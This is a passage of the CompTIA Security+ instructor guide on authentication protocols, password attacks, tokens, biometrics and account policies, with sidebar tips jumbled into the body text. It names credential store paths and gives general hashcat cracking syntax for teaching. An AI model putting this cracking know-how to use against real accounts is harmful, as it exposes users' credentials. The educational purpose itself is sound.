CHAP or PAP are
chosen these days,
remind students that
some exam questions
One of the noted drawbacks of Kerberos is that the KDC represents a single point-
might not reflect
of-failure for the network. In practice, backup KDC servers can be implemented (for the legacy nature of
example, Active Directory supports multiple domain controllers, each of which are some technologies.
running the KDC service). These protocols can
be deployed more-or-
less securely within an
PAP, CHAP, and MS-CHAP Authentication encrypted tunnel (SSL
or SSH, for instance).
Kerberos is designed to work over a trusted local network. Several authentication The idea here is that
protocols have been developed to work with remote access protocols, where the you use PKI certificates
connection is made over a serial link or virtual private network (VPN). for machine
authentication,
then perform user
Password Authentication Protocol (PAP) authentication
through the secure
The Password Authentication Protocol (PAP) is an unsophisticated authentication tunnel. (See the topic
method developed as part of the Point-to-Point Protocol (PPP), used to transfer TCP/ on EAP.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
158 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
IP data over serial or dial-up connections. It is also used as the basic authentication
mechanism in HTTP. It relies on clear text password exchange and is therefore obsolete
for most purposes, except through an encrypted tunnel.
2. Response—the client responds with a hash calculated from the server challenge
message and client password (or other shared secret).
3. Verification—the server performs its own hash using the password hash stored
for the client. If it matches the response, then access is granted; otherwise, the
connection is dropped.
The handshake is repeated with a different challenge message periodically during the
connection (although transparent to the user). This guards against replay attacks, in
which a previous session could be captured and reused to gain access.
MS-CHAPv2 is Microsoft's implementation of CHAP. Because of the way it uses
vulnerable NTLM hashes, MS-CHAP should not be deployed without the protection of a
secure connection tunnel so that the credentials being passed are encrypted.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 159
When a user chooses a password, the password is converted to a hash using a Password Attacks
cryptographic function, such as MD5 or SHA. This means that, in theory, no one
except the user (not even the system administrator) knows the password, because the Teaching
plaintext should not be recoverable from the hash. Tip
The best defense
Plaintext/Unencrypted Attacks against password
crackers is to ensure
A plaintext/unencrypted attack exploits password storage or a network authentication the use of strong
protocol that does not use encryption. Examples include PAP, basic HTTP/FTP passwords (and not
authentication, and Telnet. These protocols must not be used. Passwords must to use clear-text
protocols, of course).
never be saved to an unmanaged file. One common source of credential breaches is
You must also restrict
passwords embedded in application code that has subsequently been uploaded to a access to password
public repository. databases carefully
to try to prevent any
Online Attacks sort of eavesdropper
from running on your
An online password attack is where the threat actor interacts with the authentication networks.
service directly—a web login form or VPN gateway, for instance. The attacker submits
passwords using either a database of known passwords (and variations) or a list of
passwords that have been cracked offline.
Also, be aware that there are databases of username and password/password hash
combinations for multiple accounts stored across the Internet. These details derive from
successful hacks of various companies' systems. These databases can be searched using a
site such as haveibeenpwned.com.
An online password attack can show up in audit logs as repeatedly failed logons and
then a successful logon, or as successful logon attempts at unusual times or locations.
Apart from ensuring the use of strong passwords by users, online password attacks
can be mitigated by restricting the number or rate of logon attempts, and by shunning
logon attempts from known bad IP addresses.
Note that restricting logons can be turned into a vulnerability as it exposes the account to
denial of service attacks. The attacker keeps trying to authenticate, locking out valid users.
Password Spraying
Password spraying is a horizontal brute-force online attack. This means that the
attacker chooses one or more common passwords (for example, password or
123456) and tries them in conjunction with multiple usernames.
Offline Attacks
An offline attack means that the attacker has managed to obtain a database of
password hashes, such as %SystemRoot%\System32\config\SAM,
%SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store), or /
etc/shadow. Once the password database has been obtained, the cracker does not
interact with the authentication system. The only indicator of this type of attack (other
than misuse of the account in the event of a successful attack) is a file system audit log
that records the malicious account accessing one of these files. Threat actors can also
read credentials from host memory, in which case the only reliable indicator might be
the presence of attack tools on a host.
If the attacker cannot obtain a database of passwords, a packet sniffer might be used
to obtain the client response to a server challenge in a protocol such as NTLM or
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
160 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
CHAP/MS-CHAP. Although these protocols avoid sending the hash of the password
directly, the response is derived from it in some way. Password crackers can exploit
weaknesses in a protocol to calculate the hash and match it to a dictionary word or
brute force it.
Hybrid Attack
A hybrid password attack uses a combination of dictionary and brute-force attacks.
It is principally targeted against naïve passwords with inadequate complexity, such
as james1. The password cracking algorithm tests dictionary words and names in
combination with a mask that limits the number of variations to test for, such as adding
numeric prefixes and/or suffixes. Other types of algorithms can be applied, based on
what hackers know about how users behave when forced to select complex passwords
that they don't really want to make hard to remember. Other examples might include
substituting "s" with "5" or "o" with "0."
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 161
Although there are some Windows tools, including the infamous Cain and L0phtcrack Password Crackers
(l0phtcrack.com) tools, most password crackers run primarily on Linux. For example, a
tool such as Hashcat (hashcat.net/hashcat) is run using the following general syntax:
hashcat -m HashType -a AttackMode -o OutputFile
InputHashFile
The input file should contain hashes of the same type, using the specified format
(hashcat.net/wiki/doku.php?id=example_hashes). Hashcat can be used with a single
word list (dictionary mode -a 0) or multiple word lists (combinator mode -a 1).
Mode -a 3 performs a brute-force attack, but this can be combined with a mask for
each character position. This reduces the key space that must be searched and speeds
up the attack. For example, you might learn or intuit that a company uses only letter
characters in passwords. By omitting numeric and symbol characters, you can speed
up the attack on each hash.
Running a masked brute-force attack—this example is running on a VM, so the recovery rate is very low.
(Screenshot hashcat hashcat.net/hashcat.)
Users often adopt poor credential management practices that are very hard to control, Authentication
such as using the same password for corporate networks and consumer websites. This Management
makes enterprise network security vulnerable to data breaches from these websites.
An authentication management solution for passwords mitigates this risk by using a
device or service as a proxy for credential storage. The manager generates a unique,
strong password for each web-based account. The user authorizes the manger to
authenticate with each site using a master password.
Password managers can be implemented with a hardware token or as a software app:
• Password key—USB tokens for connecting to PCs and smartphones. Some can
use nearfield communications (NFC) or Bluetooth as well as physical connectivity
(theverge.com/2019/2/22/18235173/the-best-hardware-security-keys-yubico-titan-
key-u2f).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
162 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 163
Review Activity:
Knowledge-Based Authentication
Answer the following questions:
A long personal identification number (PIN) is difficult for users to remember, but
a short PIN is easy to crack. A PIN can only be used safely where the number of
sequential authentication attempts can be strictly limited.
3. True or false? In order to create a service ticket, Kerberos passes the user's
password to the target application server for authentication.
False—only the KDC verifies the user credential. The Ticket Granting Service (TGS)
sends the user's account details (SID) to the target application for authorization
(allocation of permissions), not authentication.
No. This is security by obscurity. The file could probably be easily discovered using
search tools.
The length of the password. If the password does not have any complexity (if it is just
two dictionary words, for instance), it may still be vulnerable to a dictionary-based
attack. A long password may still be vulnerable if the output space is small or if the
mechanism used to hash the password is faulty (LM hashes being one example).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
164 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7C
Implement Authentication Technologies
Show Slide(s)
Key Management Devices
Key Management When using public key infrastructure (PKI) for smart-card authentication, the security of
Devices the private key issued to each user is critical. One problem is that only the user should
ever be in ownership of the private key. If the network administrator is able to view these
Teaching
keys, they can impersonate any subject. Various technologies can be used to avoid the
Tip
need for an administrator to generate a private key and transmit it to the user:
Although CAC and PIV
are no longer content • Smart card—some cards are powerful enough to generate key material using the
examples, they are cryptoprocessor embedded in the card.
still in the acronyms
list. There are glossary • USB key—a cryptoprocessor can also be implemented in the USB form factor.
terms for both, if you
want to draw students' • Trusted Platform Module (TPM)—a secure cryptoprocessor enclave implemented on
attention to them. a PC, laptop, smartphone, or network appliance. The TPM is usually a module within
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 165
the CPU. Modification of TPM data is only permitted by highly trusted processes. A
TPM can be used to present a virtual smart card (docs.microsoft.com/en-us/windows/
security/identity-protection/virtual-smart-cards/virtual-smart-card-overview).
Smart cards, USB keys, and virtual smart cards are provisioned as individual devices.
Often keys need to be provisioned to non-user devices too, such as servers and
network appliances. A hardware security module (HSM) is a network appliance
designed to perform centralized PKI management for a network of devices. This means
that it can act as an archive or escrow for keys in case of loss or damage. Compared
to using a general-purpose server for certificate services, HSMs are optimized for
the role and so have a smaller attack surface. HSMs are designed to be tamper-
evident to mitigate risk of insider threat, and can also provide enterprise-strength
cryptographically secure pseudorandom number generators (CSPRNGs). HSMs can be
implemented in several form factors, including rack-mounted appliances, plug-in PCIe
adapter cards, and USB-connected external peripherals.
The FIPS 140-2 scheme provides accreditation for cryptographically strong products.
(ncipher.com/faq/key-secrets-management/what-fips-140-2.)
Smart card, smart card reader, and hardware security module (Images © 123RF.com.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
166 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Where EAP provides the authentication mechanisms, the IEEE 802.1X Port-based
Network Access Control (NAC) protocol provides the means of using an EAP method
when a device connects to an Ethernet switch port, wireless access point (with
enterprise authentication configured), or VPN gateway. 802.1X uses authentication,
authorization, and accounting (AAA) architecture:
• Supplicant—the device requesting access, such as a user's PC or laptop.
With AAA, the NAS devices do not have to store any authentication credentials. They
forward this data between the AAA server and the supplicant. There are two main
types of AAA server: RADIUS and TACACS+.
2. The NAS prompts the user for their authentication credentials. RADIUS supports
PAP, CHAP, and EAP. Most implementations now use EAP, as PAP and CHAP
are not secure. If EAP credentials are required, the NAS enables the supplicant
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 167
to transmit EAP over LAN (EAPoL) data, but does not allow any other type of
network traffic.
3. The supplicant submits the credentials as EAPoL data. The RADIUS client uses
this information to create an Access-Request RADIUS packet, encrypted using the
shared secret. It sends the Access-Request to the AAA server using UDP on port
1812 (by default).
4. The AAA server decrypts the Access-Request using the shared secret. If the
Access-Request cannot be decrypted (because the shared secret is not correctly
configured, for instance), the server does not respond.
6. At the end of this exchange, if the supplicant is authenticated, the AAA server
responds with an Access-Accept packet; otherwise, an Access-Reject packet
is returned.
Optionally, the NAS can use RADIUS for accounting (logging). Accounting uses port
1813. The accounting server can be different from the authentication server.
RADIUS is used primarily for network access control. AAA services are also used for the Terminal Access
purpose of centralizing logins for the administrative accounts for network appliances. Controller Access-
This allows network administrators to be allocated specific privileges on each switch, Control System
router, access point, and firewall. Whereas RADIUS can be used for this network
appliance administration role, the Cisco-developed Terminal Access Controller
Access-Control System Plus (TACACS+) is specifically designed for this purpose
(https://www.cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dial-
user-service-radius/13838-10.html):
• TACACS+ uses TCP communications (over port 49), and this reliable, connection-
oriented delivery makes it easier to detect when a server is down.
• All the data in TACACS+ packets is encrypted (except for the header identifying the
packet as TACACS+ data), rather than just the authentication data. This ensures
confidentiality and integrity when transferring critical network infrastructure data.
Smart-card authentication works well when you have close control over user accounts Token Keys and Static
and the devices used on the network. Other types of ownership-based authentication Codes
technologies use various hardware and software tokens. These avoid some of
the management issues of using the digital certificates required by smart-card Teaching
authentication. Tip
FIDO/U2F is not on the
A one-time password (OTP) is one that is generated automatically, rather than being
syllabus, but it is worth
chosen by a user, and used only once. Consequently, it is not vulnerable to password mentioning in terms of
guessing or sniffing attacks. An OTP is generated using some sort of hash function on a general awareness of
secret value plus a synchronization value (seed), such as a timestamp or counter. token key methods.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
168 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The SecurID token from RSA represents one popular implementation of an OTP token
key. The device generates a passcode based on the current time and a secret key
coded into the device. The code is entered along with a PIN or password known only
to the user. Network access devices must be configured with an agent to intercept the
credentials and direct them to an Authentication Manager server for validation. This
server can integrate with directory products, such as AD.
There are also simpler token keys and smart cards that simply transmit a static token
programmed into the device. For example, many building entry systems work on the
basis of static codes. These mechanisms are highly vulnerable to cloning and replay
attacks.
There are many other ways of implementing hardware token keys. For example, a
Fast Identity Online (FIDO) Universal Second Factor (U2F) USB token registers a public
key with the authentication service. The authentication mechanism then requires the
private key locked to the token, which is authorized using PIN or fingerprint activation
(fidoalliance.org/showcase/fido-u2f-security-key). This can also be used with the
Windows Hello authentication provider (microsoft.com/security/blog/2019/06/10/
advancing-windows-10-passwordless-platform).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 169
authenticate. The device and server both compute the hash and derive an HOTP value
that is 6-8 digits long. This is the value that the user must enter to authenticate with the
server. The counter is incremented by one.
The server is configured with a counter window to cope with the circumstance that the
device and server counters move out of sync. This could happen if the user generates an
OTP but does not use it, for instance.
Two-step verification mechanism protecting web application access. The site sends a Time-based One
Time Password with a duration of five minutes to the registered cell phone by SMS.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
170 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 171
Review Activity:
Authentication Technologies
Answer the following questions:
1. True or false? When implementing smart card logon, the user's private key
is stored on the smart card.
True. The smart card implements a cryptoprocessor for secure generation and storage
of key and certificate material.
A hardware security module (HSM) is optimized for this role and so present a smaller
attack surface. It is designed to be tamper-evident to mitigate against insider threat
risks. It is also likely to have a better implementation of a random number generator,
improving the security properties of key material.
Local logon providers, such as Kerberos, support smart cards, but this is not network
access control as the device has already been allowed on the network. The IEEE 802.1X
framework means that network access servers (switches, access points, and VPN
gateways) can accept Extensible Authentication Protocols (EAP) credentials, but block
any other type of network access. They act as pass-thru for an authentication server,
which stores and validates the credentials. Some EAP types support smart card or
machine authentication.
A device or server that accepts user connections, often referred to as a network access
server (NAS) or as the authenticator. Using RADIUS architecture, the client does not need
to be able to perform authentication itself; it performs pass-thru to an AAA server.
5. What is EAPoL?
A network access server that support 802.1X port-based access control can enable
a port but allow only the transfer of Extensible Authentication Protocol over LAN
(EAPoL) traffic. This allows the supplicant and authentication server to perform the
authentication process, with the network access server acting as a pass-thru.
A one-time password mechanism generates a token that is valid only for a short period
(usually 60 seconds), before it changes again.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
172 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7D
Summarize Biometrics
Authentication Concepts
Biometric 2. A feature extraction module records the features in the sample that uniquely
Authentication identify the target.
Teaching The biometric template is kept in the authentication server's database. When the user
Tip wants to access a resource, he or she is re-scanned, and the scan is compared to the
Make sure that template. If they match to within a defined degree of tolerance, access is granted.
students understand
biometrics are based Several pattern types can be used to identify people biometrically. These can be
on unique features, categorized as physical (fingerprint, eye, and facial recognition) or behavioral (voice,
not basic descriptions signature, and typing pattern matching). Key metrics and considerations used to
such as eye color. evaluate the efficacy rate of biometric pattern acquisition and matching and suitability
as an authentication mechanism include the following:
• False Rejection Rate (FRR)—where a legitimate user is not recognized. This is also
referred to as a Type I error or false non-match rate (FNMR). FRR is measured as a
percentage.
False rejection cause inconvenience to users, but false acceptance can lead to
security breaches, and so is usually considered the most important metric.
• Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the
CER, the more efficient and reliable the technology.
Errors are reduced over time by tuning the system. This is typically accomplished by
adjusting the sensitivity of the system until CER is reached.
• Throughput (speed)—the time required to create a template for each user and the
time required to authenticate. This is a major consideration for high traffic access
points, such as airports or railway stations.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 173
Physiologic biometric features represent a something you are factor. They include Fingerprint
fingerprint patterns, iris or retina recognition, or facial recognition. Recognition
Fingerprint recognition is the most widely implemented biometric authentication
method. The technology required for scanning and recording fingerprints is relatively
inexpensive and the process quite straightforward. A fingerprint sensor is usually
implemented as a small capacitive cell that can detect the unique pattern of ridges
making up the pattern. The technology is also non-intrusive and relatively simple to
use, although moisture or dirt can prevent readings.
The main problem with fingerprint scanners is that it is possible to obtain a copy of
a user's fingerprint and create a mold of it that will fool the scanner (tomsguide.com/
us/iphone-touch-id-hack,news-20066.html). These concerns are addressed by vein
matching scanners, or vascular biometrics. This requires a more complex scanner—an
infrared light source and camera—to create a template from the unique pattern of
blood vessels in a person's finger or palm.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
174 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A retinal scan uses an infrared light to identify the pattern of blood vessels in the eye.
(Photo by Ghost Presenter on Unsplash.)
• Iris scan—matches patterns on the surface of the eye using near-infrared imaging
and so is less intrusive than retinal scanning (the subject can continue to wear
glasses, for instance) and a lot quicker. Iris scanners offer a similar level of accuracy
as retinal scanners but are much less likely to be affected by diseases. Iris scanning
is the technology most likely to be rolled out for high-volume applications, such as
airport security. There is a chance that an iris scanner could be fooled by a high-
resolution photo of someone's eye.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 175
• Voice recognition—relatively cheap, as the hardware and software required are built
into many standard PCs and mobiles. However, obtaining an accurate template can
be difficult and time-consuming. Background noise and other environmental factors
can also interfere with logon. Voice is also subject to impersonation.
Some biometric and behavioral technologies might be used for purposes other than
logon authentication:
• Biometric identification refers to matching people to a database, as opposed to
authenticating them per se. For example, if an individual crossing the floor of the data
center does not produce a match for gait analysis, the system may raise a security
alert (g4s.com/en-us/media/news/2017/12/06/keeping-data-centers-secure).
• Continuous authentication verifies that the user who logged on is still operating the
device. For example, if a user successfully authenticates to a smartphone using a
fingerprint, the device continues to monitor key motion and pressure statistics as
the device is held and manipulated. If this deviates from the baseline, detection
system would lock the phone. This sort of technology is not available on the market
(at the time of writing), but it is the subject of numerous research projects.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
176 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Biometrics Authentication Concepts
Answer the following questions:
1. Apart from cost, what would you consider to be the major considerations
for evaluating a biometric recognition technology?
Error rates (false acceptance and false rejection), throughput, and whether users will
accept the technology or reject it as too intrusive or threatening to privacy.
As a capacitive cell.
4. What two ways can biometric technologies be used other than for logon
authentication?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 177
Lesson 7
Summary
You should be able to assess the design and use of authentication products for Teaching
on-premises networks, web/cloud apps, and physical security in terms of meeting Tip
confidentiality, integrity, and availability requirements. Given a product-specific setup Check that students
guide, you should be able to implement protocols and technologies such as Kerberos, are confident about
smart card authentication, and EAP/RADIUS. You should also be able to identify signs of the content that has
and risks from password attacks. been covered. If there
is time, revisit any
content examples that
Guidelines for Implementing Authentication Controls they have questions
about. If you have
Follow these guidelines when you implement authentication controls: used all the available
time for this lesson
• Assess the design requirements for confidentiality, integrity, and availability given block, note the issues
the context for the authentication solution (private network, public web, VPN and schedule time for
gateway, or physical site premises, for instance). a review later in the
course.
• Determine whether a multifactor authentication (MFA) is required, and which
Interaction
hardware token or biometric technologies would meet the requirement when
Opportunity
combined with a knowledge factor:
Optionally, discuss
• Ownership factors include smart cards, OTP keys/fobs, or OTP authenticator with students what
apps installed to a trusted device. authentication
technologies are used
• Biometric technologies include fingerprint, face, iris, retina, voice, and vein with in their workplaces.
efficacy determined by metric such as FAR, FRR, CER, speed, and accessibility. Do students have
any experience
• 2-step verification can provide an additional token to a trusted device or account of advantages or
disadvantages
via SMS, phone call, email, or push notification. of smart cards
or biometric
• Vaults and USB keys/wireless fobs can provide better security for password technologies? Is
authentication. there single sign-on
across local networks
• Select an appropriate authentication protocol or framework: and cloud services,
and if so, how is this
• Kerberos for sign-in to local networks with support for smart card authentication. implemented?
• Assess risks from password attacks, especially when using legacy procotols (PAP and
CHAP) and where hashes are exposed to capture.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 8
Implementing Identity and Account
Management Controls
Lesson Objectives
In this lesson, you will:
• Implement identity and account types.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
180 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 8A
Implement Identity and Account Types
Tokens
It is inconvenient for users to authenticate to each application they need to use. In a
single sign-on system, the user authenticates to an identity provider (IdP) and receives
a cryptographic token. The user can present that token to compatible applications as
proof they are authenticated, and receive authorizations from the application. With a
token, there is always a risk that a malicious actor will be able to capture and replay it.
The application protocol that makes use of tokens must be designed to resist this type
of attack.
Identity Providers
The identity provider is the service that provisions the user account and processes
authentication requests. On a private network, these identity directories and
application authorization services can be operated locally. The same site operates both
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 181
identity provision and application provision. Most networks now make use of third-
party cloud services, however. In this scenario, various protocols and frameworks are
available to implement federated identity management across web-based services.
This means that a user can create a digital identity with a one provider, but other sites
can use that identity to authorize use of an application.
Identity and access management (IAM) involves both IT/security procedures and Background Check
technologies and Human Resources (HR) policies. Personnel management policies are and Onboarding
applied in three phases: Policies
• Recruitment (hiring)—locating and selecting people to work in particular job roles. Teaching
Security issues here include screening candidates and performing background Tip
checks.
Explain how account
and privilege policies
• Operation (working)—it is often the HR department that manages the
apply to job roles,
communication of policy and training to employees (though there may be facilitated at least
a separate training and personal development department within larger partly by HR. These
organizations). As such, it is critical that HR managers devise training programs that written policies are
communicate the importance of security to employees. then expressed
as technical
• Termination or separation (firing or retiring)—whether an employee leaves controls, such as
voluntarily or involuntarily, termination is a difficult process, with numerous security network accounts
and permissions
implications.
assignments.
Background Check
A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. Employees working in high confidentiality environments or with
access to high value transactions will obviously need to be subjected to a greater
degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance,
background checks are mandatory. Some background checks are performed internally,
whereas others are done by an external third party.
Onboarding
Onboarding at the HR level is the process of welcoming a new employee to the
organization. The same sort of principle applies to taking on new suppliers or
contractors. Some of the same checks and processes are used in creating customer
and guest accounts. As part of onboarding, the IT and HR function will combine to
create an account for the user to access the computer system, assign the appropriate
privileges, and ensure the account credentials are known only to the valid user. These
functions must be integrated, to avoid creating accidental configuration vulnerabilities,
such as IT creating an account for an employee who is never actually hired. Some of
the other tasks and processes involved in onboarding include:
• Secure transmission of credentials—creating and sending an initial password
or issuing a smart card securely. The process needs protection against rogue
administrative staff. Newly created accounts with simple or default passwords are
an easily exploitable backdoor.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
182 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Shared authority means that no one user is able to action or enable changes on his
or her own authority. At least two people must authorize the change. One example
is separating responsibility for purchasing (ordering) from that of authorizing
payment. Another is that a request to create an account should be subject to
approval and oversight.
Separation of duties does not completely eliminate risk because there is still the chance of
collusion between two or more people. This, however, is a much less likely occurrence than
a single rogue employee.
Least Privilege
Least privilege means that a user is granted sufficient rights to perform his or her job
and no more. This mitigates risk if the account should be compromised and fall under
the control of a threat actor. Authorization creep refers to a situation where a user
acquires more and more rights, either directly or by being added to security groups
and roles. Least privilege should be ensured by closely analyzing business workflows to
assess what privileges are required and by performing regular account audits.
Job Rotation
Job rotation (or rotation of duties) means that no one person is permitted to remain
in the same job for an extended period. For example, managers may be moved to
different departments periodically, or employees may perform more than one job role,
switching between them throughout the year. Rotating individuals into and out of roles,
such as the firewall administrator or access control specialist, helps an organization
ensure that it is not tied too firmly to any one individual because vital institutional
knowledge is spread among trusted employees. Job rotation also helps prevent abuse
of power, reduces boredom, and enhances individuals' professional skills.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 183
Mandatory Vacation
Mandatory vacation means that employees are forced to take their vacation time,
during which someone else fulfills their duties. The typical mandatory vacation policy
requires that employees take at least one vacation a year in a full-week increment
so that they are away from work for at least five days in a row. During that time, the
corporate audit and security employees have time to investigate and discover any
discrepancies in employee activity.
An exit interview (or offboarding) is the process of ensuring that an employee leaves a Offboarding Policies
company gracefully. Offboarding is also used when a project using contractors or third-
parties ends. In terms of security, there are several processes that must be completed: Interaction
Opportunity
• Account management—disable the user account and privileges. Ensure that
any information assets created or managed by the employee but owned by the Ask students if they
have experienced
company are accessible (in terms of encryption keys or password-protected files).
situations where
ex-employees have
• Company assets—retrieve mobile devices, keys, smart cards, USB media, and so
caused security
on. The employee will need to confirm (and in some cases prove) that they have not issues. The Capital
retained copies of any information assets. One breach is a
classic case study
• Personal assets—wipe employee-owned devices of corporate data and applications. (krebsonsecurity.
The employee may also be allowed to retain some information assets (such as com/tag/capital-one-
personal emails or contact information), depending on the policies in force. breach).
Operating systems, network appliances, and network directory products use some Security Account
standard account types as the basis of a privilege management system. These include Types and Credential
standard user, administrative user, security group accounts, and service accounts. Management
Standard users have limited privileges, typically with access to run programs and to Teaching
create and modify files belonging only to their profile. Tip
This content is
Credential Management Policies for Personnel merging the account
types content
Improper credential management continues to be one of the most fruitful vectors examples from
for network attacks. If an organization must continue to rely on password-based objective 3.7 with the
credentials, its usage needs to be governed by strong policies and training. credential policies
content examples
A password policy instructs users on best practice in choosing and maintaining from objective 5.3.
passwords. More generally, a credential management policy should instruct users on This topic is focused
how to keep their authentication method secure, whether this be a password, smart on management/
card, or biometric ID. Password protection policies mitigate against the risk of attackers operational controls.
being able to compromise an account and use it to launch other attacks on the We will cover technical
network. The credential management policy also needs to alert users to diverse types account policy controls
in the next topic.
of social engineering attacks. Users need to be able to spot phishing and pharming
attempts, so that they do not enter credentials into an unsecure form or spoofed site.
Guest Accounts
A guest account is a special type of shared account with no password. It allows
anonymous and unauthenticated access to a resource. The Windows OS creates guest
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
184 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
user and group accounts when installed, but the guest user account is disabled by
default. Guest accounts are also created when installing web services, as most web
servers allow unauthenticated access.
Show Slide(s)
Administrator/Root
Accounts
Teaching
Tip
Make sure students
understand the
difference between
privileged accounts
and generic/default
administrator/root/
superuser accounts.
Also note that these Using security groups to assign privileges. (Images © 123RF.com.)
accounts obtain
rights from default
security groups. For
example, in Windows Administrator/Root Accounts
the "Administrator"
account is disabled Administrative or privileged accounts are able to install and remove apps and device
by default, but the drivers, change system-level settings, and access any object in the file system. Ideally,
account created only accounts that have been created and assigned specific permissions should have
during installation is this kind of elevated privilege. In practice, it is very hard to eliminate the presence
automatically added to
the "Administrators"
of default administrator accounts. A default account is one that is created by the
security group, and so operating system or application when it is installed. The default account has every
has exactly the same permission available. In Windows, this account is called Administrator; in Linux, it is
permissions. called root. This type of account is also referred to as a superuser.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 185
On Windows networks, you also need to distinguish between local administrators and
domain administrators. The scope of a local administrator's privileges is restricted to the
machine hosting the account. Domain administrators can have privileges over any machine
joined to the domain.
Ubuntu Linux follows a similar approach; the root account is configured with no
password and locked, preventing login. An alternate superuser account is created
during setup. In other Linux distributions, a password is usually set at install time. This
password must be kept as securely as is possible.
It is a good idea to restrict the number of administrative accounts as much as possible. The
more accounts there are, the more likely it is that one of them will be compromised. On
the other hand, you do not want administrators to share accounts, as that compromises
accountability.
Users with administrative privileges must take the greatest care with credential
management. Privilege-access accounts must use strong passwords and ideally
multifactor authentication (MFA).
Service accounts are used by scheduled processes and application server software, such Service Accounts
as databases. Windows has several default service account types. These do not accept
user interactive logons but can be used to run processes and background services:
• System—has the most privileges of any Windows account. The local system account
creates the host processes that start Windows before the user logs on. Any process
created using the system account will have full privileges over the local computer.
• Local Service—has the same privileges as the standard user account. It can only
access network resources as an anonymous user.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
186 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Network Service—has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.
Configuring the credentials for a service running on Windows Server. This service is using the local
system account. This account has full local administrator privileges.
(Screenshot used with permission from Microsoft.)
Linux also uses the concept of service accounts to run non-interactive daemon
processes, such as web servers and databases. These accounts are usually created by
the server application package manager. Users can be prevented from logging into
these accounts (often by setting the password to an unknown value and denying shell
access).
If a named account is manually configured to run a service, the password for the
service account will effectively be shared by multiple administrators. Many operating
systems support automatic provisioning of credentials for service accounts, reducing
the risk of insider threat (techcommunity.microsoft.com/t5/ask-the-directory-services-
team/managed-service-accounts-understanding-implementing-best/ba-p/397009).
Be aware of the risk of using a personal account when a service account is appropriate. If
you use a personal account and the user changes the password or the account is disabled
for some reason, then the service will fail to run, which can cause serious problems with
business applications.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 187
Secure Shell (SSH) is a widely used remote access protocol. It is very likely to be used to Secure Shell Keys
